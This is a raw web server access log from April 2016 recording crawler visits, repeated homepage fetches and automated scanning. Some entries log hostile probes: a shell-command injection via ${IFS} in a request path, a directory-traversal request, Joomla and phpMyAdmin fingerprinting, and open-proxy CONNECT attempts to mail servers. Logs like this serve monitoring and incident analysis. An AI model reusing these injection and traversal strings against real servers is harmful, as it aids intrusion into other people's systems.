207.46.13.31 - - [15/Apr/2016:23:00:26 +0200] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.31 - - [15/Apr/2016:23:00:31 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
81.94.192.168 - - [15/Apr/2016:23:41:26 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [15/Apr/2016:23:41:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [15/Apr/2016:23:41:26 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [15/Apr/2016:23:41:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [15/Apr/2016:23:41:27 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [15/Apr/2016:23:41:27 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [15/Apr/2016:23:41:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [15/Apr/2016:23:41:27 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [15/Apr/2016:23:41:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [15/Apr/2016:23:41:27 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [15/Apr/2016:23:41:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [15/Apr/2016:23:41:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [15/Apr/2016:23:41:27 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [15/Apr/2016:23:41:27 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [15/Apr/2016:23:41:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [15/Apr/2016:23:41:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
171.25.152.140 - - [15/Apr/2016:23:42:39 +0200] "\x16\x03\x01" 501 318 "-" "-"
171.25.152.140 - - [15/Apr/2016:23:42:50 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
171.25.152.140 - - [15/Apr/2016:23:43:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36"
171.25.152.140 - - [15/Apr/2016:23:43:10 +0200] "GET /CHANGELOG.txt HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36"
171.25.152.140 - - [15/Apr/2016:23:43:20 +0200] "GET /joomla.xml HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
171.25.152.140 - - [15/Apr/2016:23:43:31 +0200] "GET /administrator/manifests/libraries/joomla.xml HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
171.25.152.140 - - [15/Apr/2016:23:43:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1"
171.25.152.140 - - [15/Apr/2016:23:43:51 +0200] "GET /readme.html HTTP/1.1" 404 316 "-" "Mozilla/5.0 (iPad; CPU OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1"
171.25.152.140 - - [15/Apr/2016:23:44:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36"
171.25.152.140 - - [15/Apr/2016:23:44:10 +0200] "GET /language/Swedish$%7BIFS%7D&&echo$%7BIFS%7DPTOE%3EehYo&&tar$%7BIFS%7D/string.js HTTP/1.1" 404 388 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36"
171.25.152.140 - - [15/Apr/2016:23:44:20 +0200] "GET /../../../../../../../mnt/mtd/ehYo HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36"
171.25.152.140 - - [15/Apr/2016:23:44:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36"
81.94.192.168 - - [15/Apr/2016:23:52:50 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [15/Apr/2016:23:52:50 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [15/Apr/2016:23:52:50 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [15/Apr/2016:23:52:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [15/Apr/2016:23:52:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [15/Apr/2016:23:52:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [15/Apr/2016:23:52:50 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [15/Apr/2016:23:52:50 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [15/Apr/2016:23:52:50 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [15/Apr/2016:23:52:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [15/Apr/2016:23:52:50 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [15/Apr/2016:23:52:51 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [15/Apr/2016:23:52:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [15/Apr/2016:23:52:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [15/Apr/2016:23:52:51 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [15/Apr/2016:23:52:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [15/Apr/2016:23:52:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [15/Apr/2016:23:52:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [15/Apr/2016:23:52:51 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [15/Apr/2016:23:52:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:05:42 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:05:42 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:05:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:05:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:05:42 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:05:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:05:42 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:05:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:05:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:05:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:05:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:05:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:05:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:05:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:05:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:05:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:05:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:05:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:05:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:05:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:07:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:07:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:07:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:07:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:07:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:07:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:07:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:07:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:07:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:07:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:07:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:07:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:07:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:07:24 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:07:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:07:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:07:24 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:07:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:07:24 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:07:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:13:57 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:13:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:13:57 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:13:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:13:57 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:13:57 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:13:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:13:57 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:13:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:13:57 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:13:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:13:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:13:58 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:13:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:13:59 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:13:59 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:13:59 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
81.94.192.168 - - [16/Apr/2016:00:13:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:13:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.94.192.168 - - [16/Apr/2016:00:13:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
128.232.110.28 - - [16/Apr/2016:00:47:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go http package"
115.231.222.14 - - [16/Apr/2016:00:57:10 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.0940024666839271 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [16/Apr/2016:00:57:10 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.2514441777432407 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
141.212.122.209 - - [16/Apr/2016:01:24:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go http package"
62.210.143.245 - - [16/Apr/2016:01:41:13 +0200] "GET /robots.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
62.210.143.245 - - [16/Apr/2016:01:41:15 +0200] "GET /index.html HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
128.232.110.28 - - [16/Apr/2016:03:06:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go http package"
54.86.16.173 - - [16/Apr/2016:04:59:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
54.86.16.173 - - [16/Apr/2016:04:59:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36"
54.86.16.173 - - [16/Apr/2016:04:59:46 +0200] "GET /CHANGELOG.txt HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36"
54.86.16.173 - - [16/Apr/2016:04:59:48 +0200] "GET /joomla.xml HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36"
54.86.16.173 - - [16/Apr/2016:04:59:49 +0200] "GET /administrator/manifests/libraries/joomla.xml HTTP/1.1" 404 349 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36"
54.86.16.173 - - [16/Apr/2016:04:59:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36"
115.231.222.14 - - [16/Apr/2016:05:08:59 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.4614133710276173 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [16/Apr/2016:05:09:02 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.6704148715022617 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [16/Apr/2016:05:09:03 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.3480573308157226 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [16/Apr/2016:05:09:06 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.3425758943496566 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
128.232.110.28 - - [16/Apr/2016:05:32:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go http package"
111.248.112.17 - - [16/Apr/2016:05:56:22 +0200] "CONNECT 163mx00.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
114.215.104.171 - - [16/Apr/2016:06:29:41 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
138.201.30.91 - - [16/Apr/2016:06:47:18 +0200] "GET /robots.txt HTTP/1.0" 404 327 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
138.201.30.91 - - [16/Apr/2016:06:47:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
115.231.222.14 - - [16/Apr/2016:07:14:52 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.9422789592816376 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
120.132.50.135 - - [16/Apr/2016:08:07:26 +0200] "GET http://www.ctrip.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
115.231.222.14 - - [16/Apr/2016:09:20:31 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.7800266755883120 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [16/Apr/2016:09:20:33 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.1592696320187579 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
157.55.39.150 - - [16/Apr/2016:10:36:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.161 - - [16/Apr/2016:10:36:18 +0200] "GET /robots.txt HTTP/1.1" 404 323 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
111.248.96.113 - - [16/Apr/2016:11:12:15 +0200] "CONNECT 163mx01.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
115.231.222.14 - - [16/Apr/2016:11:26:25 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.7252191775597138 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [16/Apr/2016:11:26:28 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.1157634986472917 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
169.229.3.91 - - [16/Apr/2016:11:53:33 +0200] "\x8a\x87l)ux\x93\xd6\x0f\xd9R\x14\xe0\x84\x9a\x18nw\xcf&\x10lm\x9d\xc1\xa7\xba.\x87\xa8\xe6\xd6I\x97&\xf3\x17rZ,\xed\x1b\x98^\x9f+" 501 369 "-" "-"
193.92.3.66 - - [16/Apr/2016:12:11:22 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.92.3.66 - - [16/Apr/2016:12:13:40 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.92.3.66 - - [16/Apr/2016:12:14:33 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.92.3.66 - - [16/Apr/2016:12:15:18 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.92.3.66 - - [16/Apr/2016:12:17:19 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.92.3.66 - - [16/Apr/2016:12:19:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
84.201.153.7 - - [16/Apr/2016:12:23:28 +0200] "GET /robots.txt HTTP/1.1" 404 318 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
193.92.3.66 - - [16/Apr/2016:12:23:36 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.92.3.66 - - [16/Apr/2016:12:24:42 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.92.3.66 - - [16/Apr/2016:12:25:38 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.92.3.66 - - [16/Apr/2016:12:26:21 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
111.248.101.93 - - [16/Apr/2016:12:33:56 +0200] "CONNECT 163mx01.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
123.59.59.52 - - [16/Apr/2016:12:35:42 +0200] "GET http://www.ctrip.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
123.59.59.52 - - [16/Apr/2016:12:35:58 +0200] "GET http://www.qyer.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
169.229.3.91 - - [16/Apr/2016:12:40:30 +0200] "\xf7g\"x\b\x98\xdd\x87\xcfD\xf0\xee_g\x1a|\x90(\x85?-Z\xf8r\x196\x95\xf6\xd3\x1c\xb4\x90\x8c\xb6\xe3\xb9\xda\xd4\xd3j-\b`" 501 363 "-" "-"
141.212.122.209 - - [16/Apr/2016:12:50:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go http package"
45.32.239.214 - - [16/Apr/2016:13:25:27 +0200] "GET /jpg/image.jpg HTTP/1.1" 404 318 "-" "Wget/1.16 (linux-gnu)"
128.232.110.28 - - [16/Apr/2016:14:57:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go http package"
169.229.3.91 - - [16/Apr/2016:15:20:36 +0200] "\x8b\xd3{\x9et,\x84a\xa7\xf7<\x17[z\x05`\xe4\xaf1\xf5\xc7,\x81\xb3" 501 342 "-" "-"
115.231.222.14 - - [16/Apr/2016:15:41:21 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.4571431238482849 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
